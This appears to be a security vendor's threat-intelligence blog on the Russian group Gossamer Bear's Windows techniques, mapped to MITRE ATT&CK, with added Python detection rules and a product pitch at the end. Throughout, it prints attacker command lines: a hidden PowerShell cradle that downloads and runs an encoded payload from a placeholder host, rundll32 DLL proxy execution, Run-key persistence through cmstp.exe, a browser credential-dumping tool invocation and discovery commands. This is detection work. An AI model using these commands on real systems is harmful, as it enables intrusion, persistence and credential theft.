Gossamer Bear (also tracked as Callisto, Blue Charlie, Star Blizzard, COLDRIVER, and TA446) is a Russian state-sponsored threat group associated with the FSB’s 18th Center. Active since at least 2016, it conducts cyber-espionage campaigns targeting government, defense, academic, and policy organizations across NATO member states, the US, and Ukraine.
Gossamer Bear is best known for highly tailored spear-phishing operations that harvest credentials through fake login portals and malicious domains. The group maintains long-term access for intelligence collection and occasionally conducts hack-and-leak operations to influence public narratives. Its activities demonstrate a strong alignment with Russian geopolitical interests, making it a persistent and sophisticated adversary focused on strategic espionage rather than financial gain.
In this blog, we examine Gossamer Bear's Windows endpoint campaign, mapped to the MITRE ATT&CK framework.
Goal: Gossamer Bear loads a malicious DLL with rundll32.exe to run code while blending with a trusted OS binary.
Method: Drop the DLL to a writable folder (e.g., %TMP%) and invoke it with rundll32, calling a specific exported function to execute the payload.
How it hides
• Runs under a signed Windows binary, avoiding simple allowlists.
• No obvious EXE on disk — logic executes inside the DLL.
• Can be concealed by a proxy parent (e.g., winver.exe), muddying process lineage.
Picus SCV runs the same sequence to validate whether endpoint controls and telemetry detect DLL injection via rundll32 and whether parent-child process chains are visible to defenders.
#Process 1
rundll32.exe "%TMP%\vmtools.dll",fjdpw03d {predefined-process-list} winver.exe
Payload explanation
The sequence mimics dropping a DLL to a writable location and executing it via a trusted system binary to test detection of proxy execution and fileless DLL techniques.
Goal: Gossamer Bear uses BITS jobs to quietly download and stage payloads via a trusted Windows utility.
Method: Create a BITS job, copy/rename bitsadmin.exe into %TMP%, and stage files there for later execution.
Why it works for the attacker
The Picus SCV module runs the same sequence to validate whether endpoint controls, monitoring, and detection rules catch registry, file and process activity associated with BITS job abuse. This verifies if security controls flag renamed LOTL binaries, unusual copies to %TMP%, or BITS job creation and execution.
#Process 1
#Process 2
Payload explanation
The sequence mimics an attacker using a signed, living off the land binary to perform resilient downloads and to stage or execute payloads while minimizing noisy telemetry and file artifacts.
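The two techniques above share one detection problem: a signed Windows binary is doing the work, so the signal is in the surrounding context (where the DLL lives, who the parent is, and whether the binary on disk is really what its name says). The following is an added example and not code from the Picus post: it scores constructed Sysmon-style process-creation events for rundll32.exe loading a DLL from a user-writable directory under an unusual parent such as winver.exe, and for a copied or renamed bitsadmin.exe whose PE OriginalFileName no longer matches its on-disk name. Field names follow Sysmon Event ID 1 (Image, ParentImage, CommandLine, OriginalFileName); the directory list, parent baseline and rename watchlist are assumptions to tune per environment.

```python
"""
Added example (not from the Picus post): LOLBin context scoring over
constructed Sysmon-style process-creation events.
"""
import ntpath
import re
from dataclasses import dataclass
from typing import List

# Directory fragments an unprivileged user can write to (assumed list).
USER_WRITABLE = ("\\temp\\", "\\tmp\\", "\\users\\public\\", "\\programdata\\", "\\appdata\\")

# Parents that legitimately spawn rundll32.exe in most fleets (assumed baseline).
EXPECTED_RUNDLL32_PARENTS = {"explorer.exe", "svchost.exe", "services.exe", "msiexec.exe", "userinit.exe"}

# LOLBins whose OriginalFileName we compare against the image name on disk.
RENAME_WATCHLIST = {"bitsadmin.exe", "rundll32.exe", "certutil.exe", "mshta.exe", "regsvr32.exe"}

# rundll32 [path\]name.dll,ExportName  (DLL may be quoted, comma may be padded)
RUNDLL32_ARGS = re.compile(r'rundll32(?:\.exe)?"?\s+"?([^",]+\.dll)"?\s*,\s*([^\s"]+)', re.IGNORECASE)


@dataclass
class ProcessEvent:
    image: str
    parent_image: str
    command_line: str
    original_file_name: str = ""


@dataclass
class Finding:
    rule: str
    severity: int      # assumed 1 (low) .. 10 (high) scale
    detail: str


def _basename(path: str) -> str:
    return ntpath.basename(path).lower()


def _user_writable(path: str) -> bool:
    return any(fragment in path.lower() for fragment in USER_WRITABLE)


def evaluate(ev: ProcessEvent) -> List[Finding]:
    """Apply the three context rules to one event and return every rule that fired."""
    findings = []
    image, parent = _basename(ev.image), _basename(ev.parent_image)

    if image == "rundll32.exe":
        m = RUNDLL32_ARGS.search(ev.command_line)
        if m and _user_writable(m.group(1)):
            findings.append(Finding("rundll32_dll_from_user_writable", 7,
                                    f"{m.group(1)} export {m.group(2)}"))
        if parent not in EXPECTED_RUNDLL32_PARENTS:
            findings.append(Finding("rundll32_unusual_parent", 4, f"parent {parent}"))

    # Renamed copy of a LOLBin: the PE header still carries the original name.
    original = ev.original_file_name.lower()
    if original in RENAME_WATCHLIST and original != image:
        sev = 8 if _user_writable(ev.image) else 6
        findings.append(Finding("renamed_lolbin", sev, f"{image} is really {original}"))
    return findings


def rules_fired(events: List[ProcessEvent]) -> List[List[str]]:
    """Rule names per event, in input order."""
    return [[f.rule for f in evaluate(ev)] for ev in events]


# Constructed sample telemetry; %TMP% is expanded as Sysmon would log it.
SAMPLE_EVENTS = [
    ProcessEvent(r"C:\Windows\System32\rundll32.exe", r"C:\Windows\System32\winver.exe",
                 r'rundll32.exe "C:\Users\alice\AppData\Local\Temp\vmtools.dll",fjdpw03d',
                 "RUNDLL32.EXE"),
    ProcessEvent(r"C:\Windows\System32\rundll32.exe", r"C:\Windows\explorer.exe",
                 r"rundll32.exe C:\Windows\System32\shell32.dll,Control_RunDLL", "RUNDLL32.EXE"),
    ProcessEvent(r"C:\Users\alice\AppData\Local\Temp\svchost.exe", r"C:\Windows\System32\cmd.exe",
                 r"svchost.exe /list", "bitsadmin.exe"),       # renamed bitsadmin staged in %TMP%
    ProcessEvent(r"C:\Windows\System32\bitsadmin.exe", r"C:\Windows\System32\cmd.exe",
                 r"bitsadmin.exe /list", "bitsadmin.exe"),
]

if __name__ == "__main__":
    for ev, fired in zip(SAMPLE_EVENTS, rules_fired(SAMPLE_EVENTS)):
        print(_basename(ev.image), "<-", _basename(ev.parent_image), fired or "clean")
```

The OriginalFileName comparison is the cheap, high-value check here: it survives any on-disk rename and needs no hash list, at the cost of missing a binary whose version resource was stripped, which is itself worth a rule.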
Goal: Gossamer Bear targets the RunMRU registry key to erase entries from the Windows Run dialog history (Win+R), removing a key source of forensic evidence about commands that were executed.
Method: The actor uses the native reg.exe utility to manipulate registry entries. By first ensuring the key exists and then force-deleting it, the adversary quickly removes command-history artifacts that investigators rely on to reconstruct activity.
How it hides
• Uses a trusted, signed system binary (reg.exe), blending with normal admin activity.
• Operates at the registry level, leaving no file artifacts and minimizing noisy telemetry.
The Picus SCV module runs the same sequence to validate detection and response coverage for registry-based evidence removal. It demonstrates how an attacker can erase Run history and verifies whether logging/alerting catches the behavior.
#Process 1
#Process 2
Payload explanation
The sequence mimics rapid, trusted-binary cleanup of command-history evidence, testing whether endpoint and SIEM controls detect or retain sufficient telemetry for post-incident investigation.
Goal: Gossamer Bear issues a single obfuscated command that downloads an encoded PowerShell payload from a remote host and runs it directly in memory to evade signature-based detection.
Method: The actor abuses PowerShell as a living-off-the-land tool to fetch and execute code without ever writing the final payload to disk, achieving a fileless execution path.
How it hides: The payload is delivered as a Base64-encoded string and executed with flags that suppress any visible window, minimizing artifacts and user visibility.
powershell.exe -NoP -sta -NonI -W hidden -c "$e=(New-Object System.Net.webClient).downloadString('%remotefile-66%');powershell -enc $e"
Payload explanation
This safely mimics Gossamer Bear performing multi-stage, fileless code execution where the malicious logic is obscured by both network delivery and Base64 encoding.
Goal: Gossamer Bear uses PowerShell’s built-in web request feature to contact a remote server and download external content or payloads directly into memory.
Method: Leverage Invoke-WebRequest to fetch remote files or scripts over HTTP(S) using native PowerShell functionality, eliminating the need for external utilities.
How it hides
Picus SCV runs the same PowerShell command to confirm whether endpoint and network controls detect outbound connections and remote file retrievals initiated via PowerShell.
powershell.exe -c "Invoke-WebRequest -Uri %remotefile-11085%"
Payload explanation
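Both PowerShell commands above (the downloadString cradle chained into -enc, and the Invoke-WebRequest fetch) are only as opaque as the defender's normalisation step lets them be. The following is an added example and not code from the Picus post: it decodes any -EncodedCommand argument the way PowerShell does (Base64 of UTF-16LE), follows nested encodings, and then scores download-cradle and window-hiding indicators across the original and decoded text. The indicator list and weights are assumptions; the encoded sample is constructed here to exercise the decoder.

```python
"""
Added example (not from the Picus post): PowerShell command-line decoder and
download-cradle scorer for process-creation telemetry.
"""
import base64
import binascii
import re
from typing import Dict, List, Tuple

# Any unambiguous prefix of -EncodedCommand (-e, -ec, -enc, ...) followed by its argument.
ENCODED_FLAG = re.compile(r'(?:^|\s)[-/](e[a-z]*)\s+(\S+)', re.IGNORECASE)

# name -> (pattern, weight); weights are assumed, tune to your false-positive budget
INDICATORS = {
    "webclient_download": (re.compile(r'download(?:string|file|data)\s*\(', re.I), 3),
    "web_request":        (re.compile(r'invoke-webrequest|\biwr\b|invoke-restmethod|\birm\b|start-bitstransfer', re.I), 3),
    "invoke_expression":  (re.compile(r'\biex\b|invoke-expression', re.I), 3),
    "inline_base64":      (re.compile(r'frombase64string', re.I), 2),
    "hidden_window":      (re.compile(r'-w(?:indowstyle)?\s+hidden', re.I), 2),
    "no_profile":         (re.compile(r'-nop(?:rofile)?\b', re.I), 1),
    "noninteractive":     (re.compile(r'-noni(?:nteractive)?\b', re.I), 1),
    "exec_policy_bypass": (re.compile(r'-e[a-z]*\s+bypass\b', re.I), 1),
}


def decode_encoded_commands(text: str) -> Tuple[List[str], bool]:
    """Decode every -EncodedCommand argument in text. Returns (decoded_layers, flag_seen)."""
    layers, flag_seen = [], False
    for m in ENCODED_FLAG.finditer(text):
        flag, arg = m.group(1).lower(), m.group(2).strip('"\'')
        if not "encodedcommand".startswith(flag):
            continue                    # -ExecutionPolicy, -ep, ... are not the encoded flag
        flag_seen = True
        try:
            layers.append(base64.b64decode(arg, validate=True).decode("utf-16-le"))
        except (binascii.Error, UnicodeDecodeError):
            continue                    # argument is a variable such as $e, resolved only at runtime
    return layers, flag_seen


def expand(cmdline: str, max_depth: int = 3) -> Tuple[List[str], bool]:
    """The command line plus every decoded layer, following nested encodings up to max_depth."""
    texts, flag_seen, frontier = [cmdline], False, [cmdline]
    for _ in range(max_depth):
        nxt = []
        for t in frontier:
            layers, seen = decode_encoded_commands(t)
            flag_seen |= seen
            nxt.extend(layers)
        if not nxt:
            break
        texts.extend(nxt)
        frontier = nxt
    return texts, flag_seen


def analyze(cmdline: str) -> Dict[str, object]:
    """Score one command line; each indicator counts once even if it appears in several layers."""
    texts, flag_seen = expand(cmdline)
    found, score = set(), 0
    if flag_seen:
        found.add("encoded_command")
        score += 2
    for text in texts:
        for name, (pattern, weight) in INDICATORS.items():
            if name not in found and pattern.search(text):
                found.add(name)
                score += weight
    return {"score": score, "indicators": sorted(found), "decoded": texts[1:]}


def sample_encoded_cradle() -> str:
    """Constructed sample: a cradle pointing at a reserved test domain, encoded as -EncodedCommand expects."""
    inner = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/stage2.ps1')"
    b64 = base64.b64encode(inner.encode("utf-16-le")).decode("ascii")
    return f"powershell.exe -NoP -W Hidden -EncodedCommand {b64}"


# The post's own command line, with its remote-file placeholder kept as written there.
POST_COMMAND = ('powershell.exe -NoP -sta -NonI -W hidden -c "$e=(New-Object System.Net.webClient)'
                ".downloadString('%remotefile-66%');powershell -enc $e\"")

if __name__ == "__main__":
    for line in (POST_COMMAND, sample_encoded_cradle(), "powershell.exe -c Get-Date"):
        print(analyze(line))
```

Note what the post's command shows about the limits of static decoding: the inner `-enc $e` argument is a variable filled in at runtime, so the decoder can only record that the encoded flag was used. Script Block Logging (Event ID 4104) is what exposes that second stage, and the scorer above is meant to run over both the command line and those script blocks.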
Goal: Gossamer Bear drops and runs a script that registers a new scheduled task to achieve persistence.
Method: Place a script in a writable location (e.g., %TMP%) and execute it with PowerShell; the script uses the TaskScheduler COM API to create a task that runs on a schedule or at logon.
How it hides
Picus SCV executes the same script-and-register pattern to verify whether endpoint controls, scheduled-task monitoring, and change-logging detect the new task.
powershell.exe -c "%TMP%\scheduledTask.ps1"
Payload explanation
Goal: Gossamer Bear adds a registry Run key so a payload launches automatically at boot or user logon.
Method: Write an autorun entry to the HKLM Run hive that points to a signed or trusted binary invoked with a crafted argument to execute attacker-controlled code.
How it hides
Picus SCV writes the same Run-key entry to validate detection of registry persistence and whether execution via a trusted helper binary is captured by endpoint and SIEM controls.
reg add HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run /t REG_EXPAND_SZ /v SystemHealthCheck /d "cmstp.exe /s c:\programdata\DefenderService.inf" /f
Payload explanation
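The RunMRU cleanup described earlier and the Run-key autorun above are both reg.exe command lines, so one parser can serve both detections. The following is an added example and not code from the Picus post: it tokenises reg.exe invocations from process-creation telemetry, flags a forced delete of the Explorer RunMRU key as indicator removal, and flags a new Run-key value as persistence, raising the severity when the value hands execution to a proxy binary such as cmstp.exe or points into a user-writable directory. The RunMRU command lines are constructed here, since the post does not reproduce them; the proxy-binary list and severities are assumptions.

```python
"""
Added example (not from the Picus post): reg.exe command-line parser with
indicator-removal and autorun-persistence rules.
"""
import ntpath
import re
from typing import Dict, List, Optional, Tuple

REG_TOKEN = re.compile(r'"([^"]*)"|(\S+)')
RUNMRU_KEY = re.compile(r'\\Explorer\\RunMRU$', re.IGNORECASE)
RUN_KEYS = re.compile(r'\\CurrentVersion\\(Run|RunOnce|RunServices|RunServicesOnce)$', re.IGNORECASE)

# Signed binaries commonly used to proxy execution from an autorun value (assumed list).
PROXY_BINARIES = ("cmstp.exe", "rundll32.exe", "regsvr32.exe", "mshta.exe",
                  "powershell.exe", "wscript.exe", "cscript.exe", "msiexec.exe")
USER_WRITABLE = ("\\programdata\\", "\\temp\\", "\\users\\public\\", "\\appdata\\")


def tokenize(cmdline: str) -> List[str]:
    """Split a Windows command line, keeping double-quoted arguments whole."""
    return [m.group(1) if m.group(1) is not None else m.group(2)
            for m in REG_TOKEN.finditer(cmdline)]


def parse_reg_command(cmdline: str) -> Optional[Dict[str, object]]:
    """Return {'op', 'key', 'value_name', 'data', 'type', 'force'} or None if not reg.exe."""
    toks = tokenize(cmdline)
    if len(toks) < 3 or ntpath.basename(toks[0]).lower() not in ("reg", "reg.exe"):
        return None
    parsed: Dict[str, object] = {"op": toks[1].lower(), "key": toks[2].rstrip("\\"),
                                 "value_name": None, "data": None, "type": None, "force": False}
    i = 3
    while i < len(toks):
        flag, has_arg = toks[i].lower(), i + 1 < len(toks)
        if flag == "/v" and has_arg:
            parsed["value_name"] = toks[i + 1]
            i += 2
        elif flag == "/d" and has_arg:
            parsed["data"] = toks[i + 1]
            i += 2
        elif flag == "/t" and has_arg:
            parsed["type"] = toks[i + 1].upper()
            i += 2
        elif flag == "/f":
            parsed["force"] = True
            i += 1
        elif flag == "/ve":
            parsed["value_name"] = ""          # the key's default value
            i += 1
        else:
            i += 1
    return parsed


def evaluate_reg(cmdline: str) -> List[Tuple[str, int]]:
    """(rule, severity) pairs for one command line; severity on an assumed 1..10 scale."""
    p = parse_reg_command(cmdline)
    if p is None:
        return []
    findings = []
    key = str(p["key"])
    if p["op"] == "delete" and RUNMRU_KEY.search(key):
        findings.append(("runmru_history_deleted", 7 if p["force"] else 6))
    if p["op"] == "add" and RUN_KEYS.search(key):
        data = str(p["data"] or "").lower()
        severity = 5                                   # any new autorun is worth a look
        if any(data.startswith(b) or "\\" + b in data for b in PROXY_BINARIES):
            severity = 8                               # execution proxied through a signed helper
        if any(fragment in data for fragment in USER_WRITABLE):
            severity = max(severity, 7)                # payload staged where a user can write
        findings.append(("run_key_autorun_added", severity))
    return findings


# Constructed sample command lines; the Run-key one is the post's own payload.
SAMPLES = [
    r'reg.exe query HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU',
    r'reg.exe delete HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU /f',
    r'reg add HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run /t REG_EXPAND_SZ '
    r'/v SystemHealthCheck /d "cmstp.exe /s c:\programdata\DefenderService.inf" /f',
    r'reg add HKCU\Software\Contoso\App /v Installed /t REG_DWORD /d 1 /f',
]

if __name__ == "__main__":
    for line in SAMPLES:
        print(evaluate_reg(line) or "clean", "<-", line)
```

Command-line parsing only catches the reg.exe path. The same key deletion or value set done through the registry API (PowerShell's Remove-Item, a compiled tool) leaves no reg.exe process; for that the corresponding rules belong on Sysmon registry events (Event ID 12 for key create/delete, 13 for value set) or on Windows object-access auditing (4657) with a SACL on the keys in question.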
Goal: Gossamer Bear identifies which browsers are installed to target browser-specific TTPs (extensions, profiles, or credential theft).
Method: Query browser-related registry keys (or run a small enumerator) to list installed browsers and versions.
%TMP%\GetBrowserList.exe
Payload explanation
Goal: Gossamer Bear harvests browser bookmarks and profile data to locate saved URLs, SSO flows, and high-value targets for credential/session collection.
Method: Relax local PowerShell execution policy, import a collection module from %TMP%, and extract bookmark/profile artifacts for the targeted browser.
Picus SCV runs the same PowerShell sequence to verify whether script execution, module imports, and filesystem/registry reads used for browser data collection are detected and logged.
#Process 1
Payload explanation
This mimics Gossamer Bear harvesting browser artifacts for reconnaissance and credential/session harvesting, testing detection of scripted collection and local data access.
Goal: Gossamer Bear searches the filesystem for documents and office files to locate sensitive data for exfiltration or privilege escalation.
Method: Run a recursive file search for common document extensions across drives to build an inventory of candidate files.
Picus SCV executes the same search to validate whether endpoint and file-monitoring controls detect broad recursive enumeration and suspicious mass-file queries.
cmd.exe /c for %G in (.pdf, .doc, .wps, .docx, .ppt, .xls, .xlsx, .pptx, .rtf) do forfiles /p "C:" /s /M *%G /C "cmd /c echo @PATH"
Payload explanation
The sequence mimics Gossamer Bear performing wide-scale file discovery to identify exfiltration targets or files useful for lateral movement, testing whether file-access monitoring and DLP telemetry surface mass enumeration.
Goal: Gossamer Bear enumerates domain user accounts to map targets and identify high-value principals.
Method: Use the native net utility to request a list of domain accounts from a joined host or domain controller.
net.exe user /domain
Payload explanation
This mimics attacker reconnaissance to discover valid accounts for lateral movement, privilege escalation, or targeted credential attacks, testing detection of domain-level enumeration.
Goal: Gossamer Bear captures a machine’s inventory (OS build, patch levels, hotfixes, network adapters, domain membership) to profile hosts and select follow-on TTPs.
Method: Run the native systeminfo.exe utility to dump comprehensive system configuration and patch/role details.
Picus SCV executes the same command to verify whether endpoint telemetry, asset inventory systems, and SIEM ingest this output for detection and context enrichment.
systeminfo.exe
Payload explanation
This gives an attacker the environment context needed for exploit selection and lateral movement, and tests whether such profiling is captured and correlated by defenders.
Goal: Gossamer Bear collects detailed network configuration to map interfaces, IPs, gateways, DNS servers, and routing info useful for lateral movement and reconnaissance.
Method: Run the native ipconfig utility to dump the host’s complete TCP/IP settings.
Picus SCV runs the same command to verify whether endpoint and network telemetry capture network-inventory queries and surface them for detection or correlation.
ipconfig.exe /all
Payload explanation
This output gives an attacker the network topology and routing details needed to plan lateral movement, pivoting, or identify exposed services, and tests whether such enumeration is logged and flagged by defenders.
Goal: Gossamer Bear enumerates active network connections and associated PIDs to identify remote hosts, listening services, and potential command-and-control channels.
Method: Run netstat to list all TCP/UDP sockets, their states, remote endpoints, and owning process IDs.
Picus SCV runs the same command to verify whether network-connection enumeration is captured by endpoint and network telemetry and correlated with process context.
netstat -nao
Payload explanation
This gives an attacker a map of current network activity and which processes own sockets, aiding identification of C2, lateral pivots, or exposed services, and tests whether defenders link connections to processes for detection.
Goal: Gossamer Bear collects account and privilege information to find high-privilege contexts and usable credentials.
Method: Invoke whoami to return current user, group membership, and privilege/token details.
Picus SCV runs the same command to confirm whether account/context enumeration is logged and whether telemetry exposes privilege-escalation opportunities.
whoami.exe /all
Payload explanation
This reveals whether the process runs with elevated rights or membership in sensitive groups, helping attackers choose escalation or lateral-movement paths, and validates detection of privilege-context queries.
Goal: Gossamer Bear inventories running applications and services to identify interesting processes (AV, browsers, mail clients) and candidate parents for process-hiding or injection.
Method: Use tasklist to produce a verbose process list including PID, session, memory, and window title.
Picus SCV executes the same command to ensure process-enumeration telemetry is collected and that defenders can correlate process listings with suspicious activity.
tasklist.exe /v
Payload explanation
This helps an attacker spot security products, user apps with credentials/sessions, or processes suitable for proxying or injection, and tests whether process-enumeration is visible to monitoring tools.
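Each of the discovery commands in the preceding sections (the forfiles document sweep, net user /domain, systeminfo, ipconfig /all, netstat -nao, whoami /all, tasklist /v) is routine on its own; administrators run them daily. The detection value is in the burst: several distinct discovery categories from the same host and user within a few minutes. The following is an added example and not code from the Picus post: it classifies process-creation events into discovery categories and raises one alert per (host, user) whose commands span a threshold of categories inside a sliding time window. Event fields, the ten-minute window and the threshold of four categories are assumptions.

```python
"""
Added example (not from the Picus post): discovery-burst correlation over
constructed process-creation events.
"""
import ntpath
import re
from collections import defaultdict
from dataclasses import dataclass
from datetime import datetime, timedelta
from typing import Dict, List, Optional

# (category, pattern) applied to the normalised command line (executable basename first)
DISCOVERY_RULES = [
    ("system_profile",      re.compile(r'^systeminfo(?:\.exe)?\b', re.I)),
    ("network_config",      re.compile(r'^ipconfig(?:\.exe)?\b.*\s/all\b', re.I)),
    ("network_connections", re.compile(r'^netstat(?:\.exe)?\b', re.I)),
    ("account_context",     re.compile(r'^whoami(?:\.exe)?\b', re.I)),
    ("domain_accounts",     re.compile(r'^net1?(?:\.exe)?\s+user\b.*\s/domain\b', re.I)),
    ("process_inventory",   re.compile(r'^tasklist(?:\.exe)?\b', re.I)),
    ("file_discovery",      re.compile(r'\bforfiles(?:\.exe)?\b.*\s/s\b', re.I)),
]


@dataclass
class ProcessEvent:
    ts: datetime
    host: str
    user: str
    command_line: str


def normalize(cmdline: str) -> str:
    """Strip directory and quotes from the executable so rules can anchor on its name."""
    cmdline = cmdline.strip()
    m = re.match(r'"([^"]+)"|(\S+)', cmdline)
    if not m:
        return ""
    exe = m.group(1) if m.group(1) is not None else m.group(2)
    return ntpath.basename(exe).lower() + cmdline[m.end():]


def classify(cmdline: str) -> Optional[str]:
    norm = normalize(cmdline)
    for name, pattern in DISCOVERY_RULES:
        if pattern.search(norm):
            return name
    return None


def detect_discovery_bursts(events: List[ProcessEvent], window: timedelta = timedelta(minutes=10),
                            min_categories: int = 4) -> List[Dict[str, object]]:
    """One alert per (host, user): the window holding the most distinct categories, if >= threshold."""
    hits = defaultdict(list)
    for ev in sorted(events, key=lambda e: e.ts):
        cat = classify(ev.command_line)
        if cat:
            hits[(ev.host, ev.user)].append((ev.ts, cat))
    alerts = []
    for actor, seq in hits.items():
        best, start = None, 0
        for end in range(len(seq)):
            while seq[end][0] - seq[start][0] > window:
                start += 1                             # slide the window forward
            cats = {c for _, c in seq[start:end + 1]}
            if len(cats) >= min_categories and (best is None or len(cats) > len(best["categories"])):
                best = {"actor": actor, "categories": sorted(cats),
                        "first": seq[start][0], "last": seq[end][0]}
        if best:
            alerts.append(best)
    return alerts


T0 = datetime(2025, 1, 15, 9, 0, 0)     # constructed base timestamp


def _ev(minutes: int, host: str, user: str, cmd: str) -> ProcessEvent:
    return ProcessEvent(T0 + timedelta(minutes=minutes), host, user, cmd)


# Constructed sample: alice's burst mirrors the post's discovery sequence; bob and carol are noise.
SAMPLE_EVENTS = [
    _ev(0, "WS01", "CORP\\alice", "systeminfo.exe"),
    _ev(1, "WS01", "CORP\\alice", r'"C:\Windows\System32\ipconfig.exe" /all'),
    _ev(1, "WS01", "CORP\\alice", "netstat -nao"),
    _ev(2, "WS01", "CORP\\alice", "whoami.exe /all"),
    _ev(3, "WS01", "CORP\\alice", "tasklist.exe /v"),
    _ev(3, "WS01", "CORP\\alice", "net.exe user /domain"),
    _ev(5, "WS01", "CORP\\alice", r'cmd.exe /c for %G in (.pdf, .docx, .xlsx) do forfiles /p "C:" /s /M *%G /C "cmd /c echo @PATH"'),
    _ev(0, "WS02", "CORP\\bob", "ipconfig /all"),            # a help-desk one-off
    _ev(0, "WS03", "CORP\\carol", "netstat -nao"),
    _ev(120, "WS03", "CORP\\carol", "tasklist /v"),          # hours apart, no burst
]

if __name__ == "__main__":
    for alert in detect_discovery_bursts(SAMPLE_EVENTS):
        print(alert["actor"], alert["first"].time(), "->", alert["last"].time(), alert["categories"])
```

Keying on (host, user) rather than on the parent process matters for the post's scenario: the commands may be launched from different parents (cmd.exe, a PowerShell script, a proxy such as winver.exe) and the sweep only shows up once they are joined on the account that ran them.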
Goal: Gossamer Bear runs a local App-Bound Encryption (ABE) decryption utility to extract saved credentials from a browser (Edge/Chrome) profile.
Method: Execute a tool from a writable location that calls the browser’s encryption/decryption APIs or local key material to decrypt and dump stored logins, cookies, and session tokens.
How it hides
• Runs in the current user context (no elevation required), reducing telemetry noise.
• Uses native browser crypto/APIs and local profile files rather than brute-force methods.
• Executes from a benign-looking path (%TMP%), blending with normal user-launched tooling.
Picus SCV runs the same ABE decryption flow to validate whether endpoint, file-access, and process-monitoring controls detect local credential access, profile file reads, and suspicious decryption activity.
%TMP%\chrome_inject.exe -s edge
Payload explanation
The sequence simulates an attacker harvesting browser-stored credentials to support lateral movement or account takeover and tests whether defenders log and alert on local credential-exfiltration behavior.
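The bookmark harvesting described earlier and the ABE decryption flow above both end in the same place: a process that is not the browser opening files inside a Chromium-style profile directory. The following is an added example and not code from the Picus post: it evaluates constructed file-access events (the kind an EDR or a SACL-backed Event ID 4663 audit produces) for reads of Chrome and Edge credential and profile stores by anything other than the browser itself, distinguishing secret-bearing files (Login Data, Local State, Cookies, Web Data) from reconnaissance reads (Bookmarks, History) and raising the severity when the reading process was launched from a user-writable directory. The path patterns follow the Chrome/Edge profile layout; the process allow-list and severities are assumptions.

```python
"""
Added example (not from the Picus post): browser credential-store access
rules over constructed file-access events.
"""
import ntpath
import re
from dataclasses import dataclass
from typing import List, Optional

# <vendor\product>\User Data\[profile\][Network\]<artifact>
STORE_RE = re.compile(
    r'\\(google\\chrome|microsoft\\edge|chromium)\\user data\\(?:[^\\]+\\)*'
    r'(login data|local state|cookies|web data|bookmarks|history)$',
    re.IGNORECASE)

# Processes expected to open their own profile files (assumed allow-list; add backup agents as needed).
BROWSER_PROCESSES = {
    "google\\chrome": {"chrome.exe"},
    "microsoft\\edge": {"msedge.exe"},
    "chromium": {"chromium.exe", "chrome.exe"},
}
CREDENTIAL_ARTIFACTS = {"login data", "local state", "cookies", "web data"}   # secrets or key material
USER_WRITABLE = ("\\temp\\", "\\tmp\\", "\\users\\public\\", "\\programdata\\", "\\downloads\\")


@dataclass
class FileAccessEvent:
    image: str          # process that opened the file
    target: str         # file path opened
    user: str = ""


@dataclass
class Finding:
    rule: str
    severity: int       # assumed 1..10 scale
    detail: str


def _user_writable(path: str) -> bool:
    return any(fragment in path.lower() for fragment in USER_WRITABLE)


def evaluate(ev: FileAccessEvent) -> Optional[Finding]:
    """Return a finding when a non-browser process reads a browser profile store."""
    m = STORE_RE.search(ev.target)
    if not m:
        return None
    browser, artifact = m.group(1).lower(), m.group(2).lower()
    image = ntpath.basename(ev.image).lower()
    if image in BROWSER_PROCESSES.get(browser, set()):
        return None                                   # the browser reading its own profile
    if artifact in CREDENTIAL_ARTIFACTS:
        rule, severity = "browser_credential_store_read", 7
    else:
        rule, severity = "browser_profile_recon_read", 4   # bookmarks/history: reconnaissance
    if _user_writable(ev.image):
        severity += 2                                 # tool launched from a staging directory
    return Finding(rule, severity, f"{image} read {artifact} of {browser}")


def findings(events: List[FileAccessEvent]) -> List[Optional[Finding]]:
    return [evaluate(ev) for ev in events]


# Constructed sample events; %TMP% expanded as an EDR would log it.
SAMPLE_EVENTS = [
    FileAccessEvent(r"C:\Users\alice\AppData\Local\Temp\chrome_inject.exe",
                    r"C:\Users\alice\AppData\Local\Microsoft\Edge\User Data\Default\Login Data"),
    FileAccessEvent(r"C:\Users\alice\AppData\Local\Temp\chrome_inject.exe",
                    r"C:\Users\alice\AppData\Local\Microsoft\Edge\User Data\Local State"),
    FileAccessEvent(r"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe",
                    r"C:\Users\alice\AppData\Local\Microsoft\Edge\User Data\Default\Login Data"),
    FileAccessEvent(r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                    r"C:\Users\alice\AppData\Local\Google\Chrome\User Data\Default\Bookmarks"),
    FileAccessEvent(r"C:\Windows\System32\notepad.exe", r"C:\Users\alice\Documents\notes.txt"),
]

if __name__ == "__main__":
    for ev, f in zip(SAMPLE_EVENTS, findings(SAMPLE_EVENTS)):
        print(ntpath.basename(ev.image), "->", (f.rule, f.severity) if f else "clean")
```

Sysmon's file events cover creation (Event ID 11), not reads, so this rule needs either an EDR file-open feed or a read SACL on the User Data directory feeding Event ID 4663; the Local State read is the one to watch most closely, since that file holds the key material the app-bound encryption scheme protects.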
The Picus Security Validation Platform safely simulates Gossamer Bear Windows endpoint campaigns, replicating the malware’s new plug-in functionality for validation purposes. Through the Picus Threat Library, it replicates the tactics, techniques, and procedures (TTPs) observed in these campaigns to reveal detection and prevention gaps across EDR, NGFW, and SIEM technologies, before adversaries can exploit them.
You can also test your defenses against hundreds of other malware variants, such as Salt Typhoon APT, APT28, and Lazarus APT, within minutes with a 14-day free trial of the Picus Platform.
| Threat ID | Threat Name | Attack Module |
|---|---|---|
| 24801 | Gossamer Bear Threat Group Campaign | Windows Endpoint |

| Tactic | Key Takeaway (Single Line) |
|---|---|
| Defense Evasion | LotL Execution: The group uses the signed system binary Rundll32 to load and execute malicious DLLs, evading simple allowlists and blending with trusted processes. |
| Defense Evasion | Resilient Staging: Gossamer Bear abuses Background Intelligent Transfer Service (BITS) jobs to quietly download and stage payloads resiliently across reboots and network interruptions. |
| Execution | Fileless Execution: Attackers use Base64-encoded PowerShell commands to fetch and run subsequent payloads directly in memory, avoiding disk artifacts. |
| Execution | Proxy Process Launch: The threat actors obscure their execution by launching malicious processes under benign, legitimate parents like winver.exe to muddy process lineage. |
| Persistence | Scheduled Task: Persistence is established by creating a new Scheduled Task using the COM TaskScheduler API, which blends into normal system scheduling mechanisms. |
